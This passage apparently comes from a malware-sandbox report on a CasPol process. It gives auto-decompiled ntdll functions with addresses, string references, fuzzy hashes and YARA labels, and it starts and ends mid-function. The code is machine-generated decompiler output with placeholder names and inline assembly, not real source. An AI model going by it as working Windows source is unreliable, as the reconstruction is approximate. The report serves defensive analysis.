								if(( *_t108 & 0x00000020) != 0) {
									E01657016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0160A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E015DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x015e7e4c
0x015e7e50
0x015e7e55
0x015e7e58
0x015e7e5d
0x015e7e71
0x015e7f33
0x015e7e77
0x015e7e77
0x015e7e79
0x015e7e79
0x015e7e7e
0x015e7f45
0x01639848
0x00000000
0x01639848
0x015e7f4e
0x015e7f53
0x015e7f5a
0x00000000
0x00000000
0x0163985a
0x01639862
0x01639866
0x00000000
0x0163986c
0x00000000
0x0163986c
0x015e7e84
0x015e7e84
0x015e7e8d
0x01639871
0x015e7eb8
0x015e7ec0
0x015e7ec0
0x015e7e9a
0x0163987e
0x00000000
0x00000000
0x01639884
0x0163988b
0x016398a7
0x016398ac
0x016398b1
0x016398b6
0x016398b8
0x016398b8
0x016398b9
0x00000000
0x016398b9
0x015e7ea0
0x015e7ea7
0x00000000
0x00000000
0x015e7eac
0x015e7eb1
0x015e7ec6
0x015e7ed0
0x016398cc
0x015e7ed6
0x015e7ed6
0x015e7ed6
0x015e7ede
0x015e7ee3
0x016398e3
0x016398f0
0x01639902
0x016398f2
0x016398fb
0x016398fb
0x01639907
0x0163991d
0x0163991d
0x01639907
0x016398e3
0x015e7ef0
0x015e7f14
0x015e7f14
0x015e7f1e
0x01639946
0x015e7f24
0x015e7f24
0x015e7f24
0x015e7f2c
0x0163996a
0x01639975
0x01639975
0x0163997e
0x01639993
0x01639993
0x0163997e
0x00000000
0x015e7ef2
0x015e7efc
0x015e7f0a
0x015e7f0e
0x01639933
0x00000000
0x01639933
0x00000000
0x015e7f0e
0x00000000
0x00000000
0x00000000
0x015e7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 016398A2
LdrpCompleteMapModule, xrefs: 01639898
Could not validate the crypto signature for DLL %wZ, xrefs: 01639891

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: d06564ab514ba928e102a13cd40e85c8fb6187cbf628571e2c00dd8ba9fefecc
Instruction ID: 759999f97ac4d4edce9b6b9456af411a1d2018f0d574aef95c9addb53690b6e3
Opcode Fuzzy Hash: d06564ab514ba928e102a13cd40e85c8fb6187cbf628571e2c00dd8ba9fefecc
Instruction Fuzzy Hash: 4B51DF31A007469FEB2ACB6CCD88B6A7BE5FB89314F040999E9519F3D1D770E900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015DE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E015DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E015DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016195D0();
						}
						if(_t78 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0161FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0161BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01619600();
					if(_t97 < 0) {
						goto L6;
					}
					E0161BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L015DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0161BB40(_t83, _t102 + 0x24, _t78);
								if(L015E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0161BB40(_t84, _t102 + 0x24, _t94);
									if(L015E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x015de620
0x015de628
0x015de62f
0x015de631
0x015de635
0x015de637
0x015de63e
0x01635503
0x01635503
0x015de64c
0x015de64c
0x015de651
0x00000000
0x00000000
0x015de661
0x015de665
0x0163542a
0x015de715
0x015de71a
0x015de71c
0x015de720
0x015de720
0x015de727
0x015de736
0x015de736
0x015de743
0x015de743
0x015de673
0x015de678
0x015de67d
0x015de682
0x015de685
0x015de692
0x015de69b
0x015de6a3
0x015de6ad
0x015de6b1
0x015de6b2
0x015de6bb
0x015de6bf
0x015de6c0
0x015de6c8
0x015de6cc
0x015de6d5
0x015de6d9
0x00000000
0x00000000
0x015de6e5
0x015de6ea
0x015de6f9
0x015de70b
0x015de70f
0x01635439
0x0163545e
0x0163545e
0x00000000
0x0163545e
0x0163543b
0x0163543e
0x01635440
0x01635445
0x01635472
0x01635475
0x0163548d
0x01635493
0x016354a9
0x00000000
0x00000000
0x016354ab
0x016354b4
0x016354bc
0x016354c8
0x016354de
0x016354fb
0x016354e0
0x016354e6
0x016354eb
0x016354eb
0x016354de
0x00000000
0x016354bc
0x01635477
0x0163547a
0x01635480
0x01635483
0x01635486
0x0163548b
0x00000000
0x00000000
0x00000000
0x0163548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01635447
0x01635447
0x01635447
0x01635447
0x0163544e
0x00000000
0x00000000
0x01635450
0x01635452
0x01635455
0x0163545a
0x00000000
0x00000000
0x00000000
0x0163545c
0x0163546a
0x0163546d
0x0163546f
0x00000000
0x0163546f
0x015de70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015DE68C
@, xrefs: 015DE6C0
InstallLanguageFallback, xrefs: 015DE6DB

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 5782eb1270020eaa59ca7013a644f89bc7a747e144f90c627f6d5bda1b771eb6
Instruction ID: 1a6d0ebafc839eb84add5a32ed517b96814803fef219e81ae8a394452315fe4d
Opcode Fuzzy Hash: 5782eb1270020eaa59ca7013a644f89bc7a747e144f90c627f6d5bda1b771eb6
Instruction Fuzzy Hash: BC5170726053469BD724DF68C840A6BB7E8BF98714F45092EF98ADB241EB34D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0169E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0169E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0169BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0169BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0169AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01619730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0169A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0169A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0169A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0169A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E015F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E015EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E015EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E015F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0168FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0169e547
0x0169e549
0x0169e54f
0x0169e553
0x0169e557
0x0169e55a
0x0169e55c
0x0169e55f
0x0169e561
0x0169e567
0x0169e56b
0x0169e7e2
0x00000000
0x0169e571
0x0169e575
0x0169e577
0x0169e57b
0x0169e57c
0x0169e57d
0x0169e57e
0x0169e57f
0x0169e588
0x0169e58f
0x0169e591
0x0169e592
0x0169e592
0x0169e596
0x0169e59e
0x0169e5a0
0x0169e5a6
0x0169e61d
0x0169e61d
0x0169e621
0x0169e623
0x0169e630
0x0169e630
0x0169e7e6
0x0169e7eb
0x0169e7ed
0x0169e7f4
0x0169e7fa
0x0169e7ff
0x0169e7ff
0x0169e80a
0x0169e812
0x0169e812
0x0169e5ab
0x0169e5b4
0x0169e5b9
0x0169e5be
0x0169e5c0
0x0169e5c2
0x0169e5c8
0x0169e5c9
0x0169e5cb
0x0169e5cc
0x0169e5d5
0x0169e5e4
0x0169e5f1
0x0169e5f8
0x0169e5f8
0x0169e5d5
0x0169e602
0x0169e616
0x0169e63d
0x0169e644
0x0169e64d
0x0169e652
0x0169e657
0x0169e659
0x0169e65b
0x0169e661
0x0169e662
0x0169e664
0x0169e665
0x0169e66e
0x0169e67d
0x0169e68a
0x0169e691
0x0169e691
0x0169e66e
0x0169e6b0
0x00000000
0x0169e6b6
0x0169e6bd
0x0169e6c7
0x0169e6d7
0x0169e6d9
0x0169e6db
0x0169e6de
0x0169e6e3
0x0169e6f3
0x0169e6fc
0x0169e700
0x0169e700
0x0169e704
0x0169e70a
0x0169e70a
0x0169e713
0x0169e716
0x0169e719
0x0169e720
0x0169e761
0x0169e76b
0x0169e774
0x0169e77a
0x0169e77a
0x0169e78a
0x0169e791
0x0169e799
0x0169e79b
0x0169e79f
0x0169e7aa
0x0169e7c0
0x0169e7ac
0x0169e7b2
0x0169e7b9
0x0169e7b9
0x0169e7c7
0x0169e806
0x00000000
0x0169e7c9
0x0169e7d1
0x0169e7d8
0x00000000
0x0169e7d8
0x00000000
0x00000000
0x0169e722
0x0169e72e
0x0169e748
0x0169e74c
0x0169e754
0x0169e756
0x0169e75c
0x0169e75c
0x00000000
0x0169e75c
0x0169e758
0x0169e758
0x00000000
0x0169e758
0x0169e750
0x00000000
0x00000000
0x0169e752
0x00000000
0x0169e752
0x0169e730
0x0169e735
0x0169e73d
0x0169e73f
0x00000000
0x00000000
0x0169e741
0x0169e741
0x00000000
0x0169e741
0x0169e739
0x00000000
0x00000000
0x0169e73b
0x00000000
0x0169e73b
0x0169e722
0x0169e720
0x0169e6b0
0x0169e618
0x00000000
0x0169e618

Strings

`, xrefs: 0169E5D7
`, xrefs: 0169E670

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 69595a03c89312fc55a60e026a4a3d4eec563bc28624b0ff3ad7dc92e7135ba4
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E29185312043429FEB24CE69CD41B6BBBDABF84714F14892DF695CB280D775E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016551BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E016551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x16b05f0);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016553CA(0);
						return E0162D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0161F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E015F3690(1, _t117, 0x15b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0161AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L015F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0161AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0165500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01619860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x016551be
0x016551c3
0x016551c8
0x016551cd
0x016551d0
0x016551d3
0x016551d8
0x016551db
0x016551de
0x016551e0
0x016551e3
0x016551e6
0x016551e8
0x01655342
0x01655351
0x01655356
0x0165535a
0x01655360
0x01655363
0x01655366
0x01655369
0x01655369
0x0165536b
0x0165536b
0x01655370
0x016553a3
0x016553a4
0x016553a6
0x016553ab
0x016553ab
0x016553ae
0x016553ae
0x016553b5
0x016553bf
0x016553bf
0x01655375
0x01655396
0x016553a0
0x016553a0
0x00000000
0x01655396
0x01655377
0x01655379
0x0165537f
0x0165538c
0x01655390
0x00000000
0x01655390
0x016551ee
0x016551f1
0x01655301
0x01655310
0x01655315
0x01655318
0x0165531b
0x01655320
0x0165532e
0x01655331
0x00000000
0x01655331
0x01655328
0x01655329
0x00000000
0x01655329
0x016551fa
0x01655235
0x01655236
0x01655239
0x0165523f
0x01655240
0x01655241
0x01655242
0x01655246
0x01655247
0x0165524e
0x01655251
0x01655267
0x01655269
0x0165526e
0x0165527d
0x0165527e
0x01655281
0x01655282
0x01655287
0x01655288
0x0165528a
0x0165528f
0x01655294
0x00000000
0x00000000
0x0165529a
0x0165529c
0x0165529e
0x0165529e
0x016552a4
0x016552b0
0x00000000
0x00000000
0x016552ba
0x016552bc
0x016552bc
0x016552d4
0x016552d9
0x016552dc
0x016552e1
0x00000000
0x00000000
0x016552e7
0x016552f4
0x00000000
0x016552f4
0x01655270
0x00000000
0x01655270
0x016551fc
0x016551fd
0x01655202
0x01655203
0x01655205
0x0165520a
0x0165520f
0x00000000
0x00000000
0x0165521b
0x01655226
0x0165522b
0x0165521d
0x0165521d
0x01655222
0x01655222
0x0165522d
0x00000000

Strings

UEFI, xrefs: 0165521D
Legacy, xrefs: 01655226

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: aefae96cd453d67e41d82b78b2409720ffa7e8e11f402dcabe67ac2f7c3482ff
Instruction ID: 83042060ba03e2de29f2cd99c500080fc217a50965095deb7dd5ad5d2e14322d
Opcode Fuzzy Hash: aefae96cd453d67e41d82b78b2409720ffa7e8e11f402dcabe67ac2f7c3482ff
Instruction Fuzzy Hash: 12517E71E006099FDB64DFA8CD84AADBBF9FF48740F14402DEA4AEB252E7719941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015FB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E015FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x16cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E015F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E016A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01619E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0161B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0161CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E015F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E016A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0161AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x16c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x16c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x16c8628; // 0x0
							_t116 =  *0x16c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
